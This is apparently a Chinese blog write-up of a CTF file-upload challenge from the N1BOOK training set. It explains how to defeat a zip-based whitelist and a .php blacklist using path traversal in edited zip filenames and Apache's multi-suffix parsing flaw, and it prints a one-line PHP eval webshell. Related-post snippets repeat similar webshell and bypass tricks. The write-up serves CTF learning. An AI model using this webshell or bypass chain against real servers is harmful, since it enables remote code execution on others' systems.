BUUCTF_N1BOOK_[第二章 web进阶]文件上传_详解

最新推荐文章于 2024-04-19 17:25:47 发布
最新推荐文章于 2024-04-19 17:25:47 发布
阅读量1k 收藏 6
点赞数 3
文章标签: 前端 php apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43852034/article/details/129331443
版权

N1BOOK

[第二章 web进阶]文件上传

《从0到1:CTFer成长之路》书籍配套题目,来源网站:book.nu1l.com

源码:

题目有给php形式的源码,这里就省略一下。

文件上传路径分析

主页面是一个web界面,有一个文件提交的入口,然后给出了后台对文件处理用的php代码。

从以下php代码中可以看出:

	$dir = 'upload/';
    $ext = strtolower(substr(strrchr($name, '.'), 1));
    $path = $dir.$name;

...

	$temp_dir = $dir.md5(time(). rand(1000,9999));

...

            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                   exit("解压失败");
            }

...

            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);

最终上传文件的路径是在/upload/md5(time(). rand(1000,9999))/filename里面,由于其中的随机值+md5加密,其路径是无法直接获取并访问的,所以想到要用路径穿越,在上传的webshell文件名(比如,2.php)之前增加路径穿越,构造其文件名为/../../2.php

之所以要穿越两层,是因为upload路径经测试也是无法直接访问的:

在这里插入图片描述

Apache解析漏洞

而在upload路径访问失败的同时,发现了Apache版本过低、存在漏洞:

Apache解析漏洞

1.多后缀文件解析漏洞
在以上Apache配置下,当使用AddType(非之前的AddHandler)时,多后缀文件会从最右后缀开始识别,如果后缀不存在对应的MIME type或Handler,则会继续往左识别后缀,直到后缀有对应的MIME type或Handler。x.php.xxx文件由于xxx后缀没有对应的handler或mime type,这时往左识别出PHP后缀,就会将该文件交给application/x-httpd-php处理

2.Apache CVE-2017-15715漏洞
在HTTPD 2.4.0到2.4.29版本中,FilesMatch指令正则中“$”能够匹配到换行符,可能导致黑名单绕过

除了低版本apache存在解析漏洞这一说法,还有一种观点认为是:

apache 2.x版本,同时以module方式使apache与php结合,就会导致这样的解析漏洞。

详见:https://www.zhiu.cn/177436.html

总之,当Apache存在解析漏洞时,文件名的后缀Apache无法解析时,就会从文件名的最右端往左继续寻找可以解析的后缀。

比如2.php.xxx.yyy.zzz,Apache碰到.zzz发现不认识,所以往左找到了.yyy也不认识,又往左找到了.xxx还是不认识,最后找到了.php终于认识了,结果这个文件就被当做.php文件来解析了。

白名单绕过

根据源码最后一段逻辑判断代码进行分析:

    if(in_array($ext, array('zip', 'jpg', 'gif', 'png'))){
        if($ext == 'zip'){
            $archive = new PclZip($file['tmp_name']);
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
                if(preg_match('/\.php$/', $filename)){
                     exit("压缩包内不允许含有php文件!");
                 }
            }
            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                   exit("解压失败");
            }

            check_dir($dir);
            exit('上传成功!');
        }else{
            move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);
            check_dir($dir);
            exit('上传成功!');
        }
    }else{
        exit('仅允许上传zip、jpg、gif、png文件!');
    }

发现第一个判断就给出了白名单,只有.zip.jpg.gif.png文件可以通过第一个条件判断。

而后,除了.zip文件,另外三种类型的文件被直接存到了

move_uploaded_file($file['tmp_name'], $temp_dir.'/'.$file['name']);

这个目录之下,所以即使没太看懂.zip条件分支里的这段代码干了啥:

            if ($archive->extract(PCLZIP_OPT_PATH, $temp_dir, PCLZIP_OPT_REPLACE_NEWER) == 0) {
                check_dir($dir);
                   exit("解压失败");
            }

但是也能猜到,这里是进行了解压,并将文件保存到了同一个路径之下。

所以我们如果要上传一句话木马,只能选择用.zip的形式将其打包,来绕过第一层的白名单检测。

黑名单绕过

但是,在.zip的条件分支中,在解压之前还存在着这样的代码:

            $archive = new PclZip($file['tmp_name']);
            foreach($archive->listContent() as $value){
                $filename = $value["filename"];
                if(preg_match('/\.php$/', $filename)){
                     exit("压缩包内不允许含有php文件!");
                 }
            }

PclZip中的listContent()是在zip文件解压前,从.zip文件的头部直接获取并列出压缩档中的内容,包括档案的属性与目录。

而后在该代码中被获取的、被压缩文件的文件名会被送入下面的if语句进行黑名单判断,如果后缀是.php上传就会失败。

这一点结合Apache的解析漏洞,我们可以构造文件名为/../../2.php.xxx,文件末尾的.xxx在绕过黑名单后,又利用Apache解析漏洞使得文件被最终解析为.php文件运行。

一句话木马的终极形态!

至此,我们可以确认最终的一句话木马的文件名应为:

/../../2.php.xxx

文件内容:

<?php eval($_POST['passwd']);?>

但是在文件命名时,我们无法将用/…/…/直接命名,所以先用同等长度的字符替代之,将文件命名为:

12212212.php.xxx

然后将其压缩为.zip文件,并放入010 Eidtor中进行修改:

在这里插入图片描述

最终,将修改后的12212212.php.zip文件上传。

最后的一点小插曲…

本来以为上传成功之后,用蚁剑砍进去就完事儿了,结果发现居然会报错:

在这里插入图片描述

嗯???

于是直接访问一下上传后的文件:

在这里插入图片描述

没想到直接得到了flag…

后续又把2.php.xxx文件的内容修改为<?php phpinfo();?>尝试了一下,发现访问后也是同样的效果。

那大概是环境本身做了限制吧…

思路应该是没错的,蚁剑虽然说没砍进去…

但你就说flag拿没拿到吧!

自跳坑
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
web-文件上传【超详细讲解】
wo41ge的博客
12-01 1682
web151-前端验证 前端验证,抓包修改数据OK web152-前端+MIME 直接抓包修改后缀 web153-.user.ini 对 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样效果。 除了主 php.ini 之外,PHP 还会在每个目录下扫描 INI 文件,从被执行的
BUUCTF-Web】[极客大挑战 2019]Upload
weixin_49298681的博客
01-05 1036
Upload=> 文件上传漏洞。
BUUCTF文件上传知识点总结
qq_49833809的博客
11-13 571
文件上传知识点总结
文件上传典型题(buuctf)加深知识点
最新发布
Z11762的博客
04-19 773
89a版的一个最主要的优势就是可以创建动态图像,例如创建一个旋转的图标、用一只手挥动的旗帜或是变大的字母。特别值得注意的是,一个动态GIF是一个 以GIF89a格式存储的文件,在一个这样的文件里包含的是一组以指定顺序呈现的图片。当服务器收到对ASP文件的请求时,它会处理包含在用于构建发送给浏览器的HTML(Hyper Text Markup Language,超文本置标语言)网页文件中的服务器端脚本代码。0x00是十六进制表示方法,是ascii码为0的字符,在有些函数处理时,会把这个字符当做结束符。
[CTF]web进阶文件上传
hclimg的博客
12-03 2845
题目:web进阶文件上传 查看题目,底下已经给出了源代码: 服务器对文件进行了白名单设置,允许上传zip、jpg、gif、png文件!我随便上传几张一句话木马图片,均能够上传成功,说明他只对文件的后缀进行验证。上传不难,难的是上传后找不到文件的路径,无法访问。 观察关于目录的代码发现,文件上传后,会随机生成一个MD5目录,把文件放在这个地方,但是MD5目录无法预知,所以难度大大的加大。 通过解读zip文件代码可知,通过zip上传后,服务器会对zip进行解压,放在upload目录下,然后如果这个目录下
N1Book-第二章Web进阶-Web文件上传漏洞
weixin_40872714的博客
03-31 4460
N1Book-第二章Web进阶-Web文件上传漏洞 以下内容转自 https://www.icode9.com/content-4-874265.html <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 //会包含文件pclzip.lib.php,感觉这个php里面是有一些针对zip包进行解压等的操作的 require_once('pclzip.lib.php'); //要是没上传文件,就输出
BUUCTF-Web[ACTF2020 新生赛]Upload
rumil的博客
06-24 2193
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml时上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传。
USB_Burning_Tool_USB_Burning_Tool3_V2_n1_
09-29
标签“USB_Burning_Tool3 V2 n1”进一步确认了这是一个USB烧录工具的第二版,可能是系列中的第三个主要版本,"n1"可能表示一个特定的小版本或内部版本编号,这通常用于区分软件的不同迭代。 在压缩包内的文件...
Topsis.zip_13N1_memberfmc_topsis_topsis matlab_综合距离
07-15
用于综合排序,根据评价对象与正理想解、负理想解之间的距离排序
N1_Openwrt_r9.12.31_k5.4.10-amlogic-flippy-21+
04-20
N1_Openwrt_r9.12.31_k5.4.10-amlogic-flippy-21+N1_Openwrt_r9.12.31_k5.4.10-amlogic-flippy-21+N1_Openwrt_r9.12.31_k5.4.10-amlogic-flippy-21+N1_Openwrt_r9.12.31_k5.4.10-amlogic-flippy-21+N1_Openwrt_r9.12...
STL priority_queue(优先队列)详解
09-01
bool operator()(const Node& n1, const Node& n2) { if (n1.priority == n2.priority) { return strcmp(n1.szName, n2.szName) ; } return n1.priority ; } }; // 然后可以创建一个使用NodeCmp比较函数的...
T1_N1一键降级工具v1.1版本
09-12
压缩包子文件的文件名称"N1-T1降刷机助手v1.1版本"进一步证实了这是一个用于N1和T1设备的降级或刷机程序,版本号为1.1,意味着这是软件的更新版本,可能包含了错误修复、性能提升或者增加了新的功能。 在使用这个...
BUUCTF n1book [第二章 web进阶]文件上传
nareku的博客
07-02 2379
花了一天多才搭好docker的环境,然后再来写这道只能说自己的环境也太香啦 不过这道题也花了一点点点时间琢磨打开题目,发现是一如既往的文件上传界面 习惯性抓个包,界面源码已经完全暴露了,太长了这里就不放了(根据以往的经验和参考其他的师傅的wp 小小地分析了一下) 这样我们上传的文件的路径就是 upload/随机值/上传的文件名首先我们先创建一个文件(不是文件夹!!),文件后缀随便,只要文件名长度满足18即可,这就成功将后缀完全覆盖了 将文件压缩成zip 在010Edtior中打开该压缩包 修改文件名
buuctf文件上传漏洞(Pass1~15)
yxzrw_TW的博客
10-21 1494
文件上传漏洞笔记
[第二章 web进阶]文件上传]
DdddddXxxxx的博客
08-08 915
先看一下题目源码: <?php header("Content-Type:text/html; charset=utf-8"); // 每5分钟会清除一次目录下上传的文件 require_once('pclzip.lib.php'); if(!$_FILES){ echo ' <!DOCTYPE html> <html lang="zh"> <head> <meta charset="UTF-8" /> <
BUUCTF Web upload
H18779083518的博客
05-10 334
script language="php">eval($_REQUEST[1])</script>打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了。方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload。方法一:看bp的回显(我没看见所以选择了方法二)成功上传一句话木马后我们尝试寻找木马的存放路径。找到路径后使用蚁剑连接,连接成功。
Web-buuctf-Upload
weixin_52804141的博客
01-20 168
这里两种绕过方法,第一种在浏览器中把java scrabit脚本关了就可以了,第二种更改下后缀文件,改成允许上传的文件后缀就好了。这里改成在把文件后缀改位php,发现不行,就可以试试phtml(这两种后缀都不会被服务器视为php执行)总结,很简单的一道上传题,以前也练过很多,就当一道复习题来做了。上传成功,蚁剑连接就好了,在找到flag文件,获得flag。先上传一个一句话木马,发现存在前端绕过。
Buuctf文件上传.uesr.ini绕过)[SUCTF 2019]CheckIn 1
m0_64444909的博客
05-21 2193
解题思路 一.打开题目:发现一个上传框,猜测上传一句话木马,获取后台shell 二.上传.php .phtml .等有关的PHP文件,都显示非法后缀 三.上传.htaccess文件
BUUCTF-Web-[ACTF2020新生赛]Upload
m0_61851859的博客
03-27 387
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
光纤通信技术第二章(共116张PPT).pptx
11-16
光纤通信技术第二章(共116张PPT).pptx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值